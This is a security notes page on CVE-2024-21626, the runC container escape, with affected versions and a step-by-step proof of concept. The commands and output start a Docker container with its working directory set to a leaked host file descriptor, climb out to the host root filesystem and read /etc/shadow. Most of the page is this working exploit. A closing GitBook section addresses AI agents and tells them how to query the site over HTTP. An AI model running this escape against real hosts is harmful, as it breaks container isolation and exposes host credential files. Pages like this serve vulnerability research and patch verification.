> For the complete documentation index, see [llms.txt](https://0xpthree.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xpthree.gitbook.io/notes/exploits-pocs/runc/cve-2024-21626.md).

# CVE-2024-21626

RunC, a container runtime component, published version `1.1.12` to fix **CVE-2024-21626** at 31, Jan 2024, which leads to <mark style="color:red;">**escaping from containers**</mark>.&#x20;

Affected versions..\
.. runC **v1.0.0-rc93** - **1.1.11**. \
.. containerd **1.4.7** - **1.6.27** and **1.7.0** - **1.7.12.**\
.. Docker **<=25.0.1**.

### POC

* Make sure the user is in the docker group, and RunC running a vulnerable version.&#x20;
* Start a new container and set the working directory to `/proc/self/fd/<fd>` (where `<fd>` stands for the file descriptor when opening `/sys/fs/cgroup` in host filesystem. Usually it’s 7 or 8).

```bash
cve-2024-21626 ➜ id
uid=1000(user) ... snip ...,998(docker)

cve-2024-21626 ➜ runc --version
runc version 1.1.5+ds1
commit: 1.1.5+ds1-1+b4
spec: 1.1.0
go: go1.21.3
libseccomp: 2.5.4

cve-2024-21626 ➜ id docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
... snip ...
root@7185badc969c:.# pwd
pwd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@7185badc969c:.# ls -al
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@7185badc969c:.# cd ../../
root@7185badc969c:../..# ls -al
total 88
drwxr-xr-x  19 root root  4096 Oct 31 11:20 .
drwxr-xr-x  19 root root  4096 Oct 31 11:20 ..
drwx------   2 root root  4096 Oct 31 10:17 .cache
lrwxrwxrwx   1 root root     7 Oct 31 09:44 bin -> usr/bin
drwxr-xr-x   3 root root  4096 Oct 31 11:24 boot
drwxr-xr-x  17 root root  3420 Feb  8 07:46 dev
drwxr-xr-x 199 root root 12288 Jan 26 11:22 etc
drwxr-xr-x   3 root root  4096 Oct 31 10:58 home
lrwxrwxrwx   1 root root    33 Oct 31 11:20 initrd.img -> boot/initrd.img-6.5.0-kali3-amd64
lrwxrwxrwx   1 root root    33 Oct 31 09:46 initrd.img.old -> boot/initrd.img-6.3.0-kali1-amd64
lrwxrwxrwx   1 root root     7 Oct 31 09:44 lib -> usr/lib
lrwxrwxrwx   1 root root     9 Oct 31 09:44 lib32 -> usr/lib32
lrwxrwxrwx   1 root root     9 Oct 31 09:44 lib64 -> usr/lib64
drwx------   2 root root 16384 Oct 31 09:44 lost+found
drwxr-xr-x   3 root root  4096 Oct 31 09:44 media
drwxr-xr-x   3 root root  4096 Nov  8 13:45 mnt
drwxr-xr-x   3 root root  4096 Oct 31 10:11 opt
dr-xr-xr-x 227 root root     0 Feb  8 07:46 proc
drwx------   7 root root  4096 Feb  7 11:07 root
drwxr-xr-x  37 root root   980 Feb  8 07:46 run
lrwxrwxrwx   1 root root     8 Oct 31 09:44 sbin -> usr/sbin
drwxr-xr-x   3 root root  4096 Oct 31 10:17 srv
dr-xr-xr-x  13 root root     0 Feb  8 07:46 sys
drwxrwxrwt  14 root root 12288 Feb  8 10:55 tmp
drwxr-xr-x  15 root root  4096 Oct 31 11:14 usr
drwxr-xr-x  12 root root  4096 Oct 31 11:31 var
lrwxrwxrwx   1 root root    30 Oct 31 11:20 vmlinuz -> boot/vmlinuz-6.5.0-kali3-amd64
lrwxrwxrwx   1 root root    30 Oct 31 09:46 vmlinuz.old -> boot/vmlinuz-6.3.0-kali1-amd64

root@7185badc969c:../../..# cat etc/shadow
user:$y$ZZZ$XXXX:19661:0:99999:7:::
```

More in-depth information here:\
<https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://0xpthree.gitbook.io/notes/exploits-pocs/runc/cve-2024-21626.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.